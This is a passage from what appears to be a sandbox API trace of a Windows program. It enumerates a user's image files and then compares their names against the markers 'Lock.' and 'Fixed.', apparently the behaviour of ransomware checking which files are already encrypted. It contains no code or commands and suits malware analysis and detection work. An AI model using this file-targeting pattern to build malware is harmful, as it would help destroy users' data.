wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb36f5700, ftCreationTime.dwHighDateTime=0x1d5ce58, ftLastAccessTime.dwLowDateTime=0x3b49d730, ftLastAccessTime.dwHighDateTime=0x1d5c996, ftLastWriteTime.dwLowDateTime=0x3b49d730, ftLastWriteTime.dwHighDateTime=0x1d5c996, nFileSizeHigh=0x0, nFileSizeLow=0xfbd8, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="E8Pb7e.bmp", cAlternateFileName="")) returned 1 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.557] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c202c50, ftCreationTime.dwHighDateTime=0x1d5c8a6, ftLastAccessTime.dwLowDateTime=0xf9e92410, ftLastAccessTime.dwHighDateTime=0x1d5c85c, ftLastWriteTime.dwLowDateTime=0xf9e92410, ftLastWriteTime.dwHighDateTime=0x1d5c85c, nFileSizeHigh=0x0, nFileSizeLow=0xeb64, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="EHKlEyoM3xoIg8ms.jpg", cAlternateFileName="EHKLEY~1.JPG")) returned 1 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a4ab90, ftCreationTime.dwHighDateTime=0x1d5cfc9, ftLastAccessTime.dwLowDateTime=0xfec1ce90, ftLastAccessTime.dwHighDateTime=0x1d5d37b, ftLastWriteTime.dwLowDateTime=0xfec1ce90, ftLastWriteTime.dwHighDateTime=0x1d5d37b, nFileSizeHigh=0x0, nFileSizeLow=0x1265e, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="F3GpsjDs7t.png", cAlternateFileName="F3GPSJ~1.PNG")) returned 1 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906bfc10, ftCreationTime.dwHighDateTime=0x1d5d32e, ftLastAccessTime.dwLowDateTime=0xc047fd0, ftLastAccessTime.dwHighDateTime=0x1d5cb3e, ftLastWriteTime.dwLowDateTime=0xc047fd0, ftLastWriteTime.dwHighDateTime=0x1d5cb3e, nFileSizeHigh=0x0, nFileSizeLow=0xfb7e, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="FS3WVwrvnLekT9.jpg", cAlternateFileName="FS3WVW~1.JPG")) returned 1 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde29fb10, ftCreationTime.dwHighDateTime=0x1d5d490, ftLastAccessTime.dwLowDateTime=0x44d1e970, ftLastAccessTime.dwHighDateTime=0x1d5cb74, ftLastWriteTime.dwLowDateTime=0x44d1e970, ftLastWriteTime.dwHighDateTime=0x1d5cb74, nFileSizeHigh=0x0, nFileSizeLow=0xfe5, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="G_BhwPRnGbbQ-dfc.bmp", cAlternateFileName="G_BHWP~1.BMP")) returned 1 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.558] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31506860, ftCreationTime.dwHighDateTime=0x1d5d2e3, ftLastAccessTime.dwLowDateTime=0x21fb5f0, ftLastAccessTime.dwHighDateTime=0x1d5d7b6, ftLastWriteTime.dwLowDateTime=0x21fb5f0, ftLastWriteTime.dwHighDateTime=0x1d5d7b6, nFileSizeHigh=0x0, nFileSizeLow=0x15e09, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="H4_H0S0fmbzOF.png", cAlternateFileName="H4_H0S~1.PNG")) returned 1 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e0fe100, ftCreationTime.dwHighDateTime=0x1d5d14f, ftLastAccessTime.dwLowDateTime=0x9926a460, ftLastAccessTime.dwHighDateTime=0x1d5cbc5, ftLastWriteTime.dwLowDateTime=0x9926a460, ftLastWriteTime.dwHighDateTime=0x1d5cbc5, nFileSizeHigh=0x0, nFileSizeLow=0x3cf9, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Hv6N_Hm7BbFlazd6N.gif", cAlternateFileName="HV6N_H~1.GIF")) returned 1 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bd0190, ftCreationTime.dwHighDateTime=0x1d5cc81, ftLastAccessTime.dwLowDateTime=0xb18eb580, ftLastAccessTime.dwHighDateTime=0x1d5cbfa, ftLastWriteTime.dwLowDateTime=0xb18eb580, ftLastWriteTime.dwHighDateTime=0x1d5cbfa, nFileSizeHigh=0x0, nFileSizeLow=0x8c04, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ko-PEUGJ.png", cAlternateFileName="")) returned 1 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9c1d90, ftCreationTime.dwHighDateTime=0x1d5d3cb, ftLastAccessTime.dwLowDateTime=0x534da710, ftLastAccessTime.dwHighDateTime=0x1d5c9b1, ftLastWriteTime.dwLowDateTime=0x534da710, ftLastWriteTime.dwHighDateTime=0x1d5c9b1, nFileSizeHigh=0x0, nFileSizeLow=0x18cc1, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ktNHTaW.bmp", cAlternateFileName="")) returned 1 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.559] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1708b0, ftCreationTime.dwHighDateTime=0x1d5d177, ftLastAccessTime.dwLowDateTime=0x84499200, ftLastAccessTime.dwHighDateTime=0x1d5cad0, ftLastWriteTime.dwLowDateTime=0x84499200, ftLastWriteTime.dwHighDateTime=0x1d5cad0, nFileSizeHigh=0x0, nFileSizeLow=0x8889, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="LloJL.jpg", cAlternateFileName="")) returned 1 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a6af340, ftCreationTime.dwHighDateTime=0x1d5d2e8, ftLastAccessTime.dwLowDateTime=0x2074fe10, ftLastAccessTime.dwHighDateTime=0x1d5d802, ftLastWriteTime.dwLowDateTime=0x2074fe10, ftLastWriteTime.dwHighDateTime=0x1d5d802, nFileSizeHigh=0x0, nFileSizeLow=0x99c9, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="LXxgX8.png", cAlternateFileName="")) returned 1 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.560] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3af6e5f0, ftCreationTime.dwHighDateTime=0x1d5cbeb, ftLastAccessTime.dwLowDateTime=0x4a391770, ftLastAccessTime.dwHighDateTime=0x1d5cdc3, ftLastWriteTime.dwLowDateTime=0x4a391770, ftLastWriteTime.dwHighDateTime=0x1d5cdc3, nFileSizeHigh=0x0, nFileSizeLow=0x11480, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="mwiYwwD-pGtpU_YSC3.bmp", cAlternateFileName="MWIYWW~1.BMP")) returned 1 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d874440, ftCreationTime.dwHighDateTime=0x1d5ccc8, ftLastAccessTime.dwLowDateTime=0x91950f80, ftLastAccessTime.dwHighDateTime=0x1d5cf0c, ftLastWriteTime.dwLowDateTime=0x91950f80, ftLastWriteTime.dwHighDateTime=0x1d5cf0c, nFileSizeHigh=0x0, nFileSizeLow=0x115b, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Oj8L14m5Ftw_q T.bmp", cAlternateFileName="OJ8L14~1.BMP")) returned 1 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca0f1f0, ftCreationTime.dwHighDateTime=0x1d5ce46, ftLastAccessTime.dwLowDateTime=0xf2ae86f0, ftLastAccessTime.dwHighDateTime=0x1d5d3f5, ftLastWriteTime.dwLowDateTime=0xf2ae86f0, ftLastWriteTime.dwHighDateTime=0x1d5d3f5, nFileSizeHigh=0x0, nFileSizeLow=0x18b56, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="pkrWGiqtaBO.gif", cAlternateFileName="PKRWGI~1.GIF")) returned 1 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38cc4060, ftCreationTime.dwHighDateTime=0x1d5cdf1, ftLastAccessTime.dwLowDateTime=0x37eac020, ftLastAccessTime.dwHighDateTime=0x1d5c9b6, ftLastWriteTime.dwLowDateTime=0x37eac020, ftLastWriteTime.dwHighDateTime=0x1d5c9b6, nFileSizeHigh=0x0, nFileSizeLow=0x3e21, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ul6W7nkKmk8Vcoms6H.gif", cAlternateFileName="UL6W7N~1.GIF")) returned 1 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x342feca0, ftCreationTime.dwHighDateTime=0x1d5cff9, ftLastAccessTime.dwLowDateTime=0x3269c7b0, ftLastAccessTime.dwHighDateTime=0x1d5c85b, ftLastWriteTime.dwLowDateTime=0x3269c7b0, ftLastWriteTime.dwHighDateTime=0x1d5c85b, nFileSizeHigh=0x0, nFileSizeLow=0x89d8, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="v1scJjcpwcvzTSqU.png", cAlternateFileName="V1SCJJ~1.PNG")) returned 1 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19ceef0, ftCreationTime.dwHighDateTime=0x1d5d782, ftLastAccessTime.dwLowDateTime=0x38c01930, ftLastAccessTime.dwHighDateTime=0x1d5d214, ftLastWriteTime.dwLowDateTime=0x38c01930, ftLastWriteTime.dwHighDateTime=0x1d5d214, nFileSizeHigh=0x0, nFileSizeLow=0x110e2, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="W9bUf5L8kEVKE-hdQ.png", cAlternateFileName="W9BUF5~1.PNG")) returned 1 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3689d1c0, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0x33747c30, ftLastAccessTime.dwHighDateTime=0x1d5cf46, ftLastWriteTime.dwLowDateTime=0x33747c30, ftLastWriteTime.dwHighDateTime=0x1d5cf46, nFileSizeHigh=0x0, nFileSizeLow=0x51aa, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Wi_9DL5txr1IbTGlf8.bmp", cAlternateFileName="WI_9DL~1.BMP")) returned 1 [0208.562] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf19ccb10, ftCreationTime.dwHighDateTime=0x1d5d5b1, ftLastAccessTime.dwLowDateTime=0x886c4fc0, ftLastAccessTime.dwHighDateTime=0x1d5d21a, ftLastWriteTime.dwLowDateTime=0x886c4fc0, ftLastWriteTime.dwHighDateTime=0x1d5d21a, nFileSizeHigh=0x0, nFileSizeLow=0x575e, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Y1E-1EvHMk4d A6QVp8.png", cAlternateFileName="Y1E-1E~1.PNG")) returned 1 [0208.563] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1d89dd0, ftCreationTime.dwHighDateTime=0x1d5ca9c, ftLastAccessTime.dwLowDateTime=0xd6529ab0, ftLastAccessTime.dwHighDateTime=0x1d5d7c3, ftLastWriteTime.dwLowDateTime=0xd6529ab0, ftLastWriteTime.dwHighDateTime=0x1d5d7c3, nFileSizeHigh=0x0, nFileSizeLow=0xe4ac, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="yyplXweR.gif", cAlternateFileName="")) returned 1 [0208.563] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0208.563] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0208.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5aASoDBkD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aASoDBkD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASoDBkD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SoDBkD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oDBkD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DBkD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BkD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kD4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ug.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5aASoDBkD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.564] 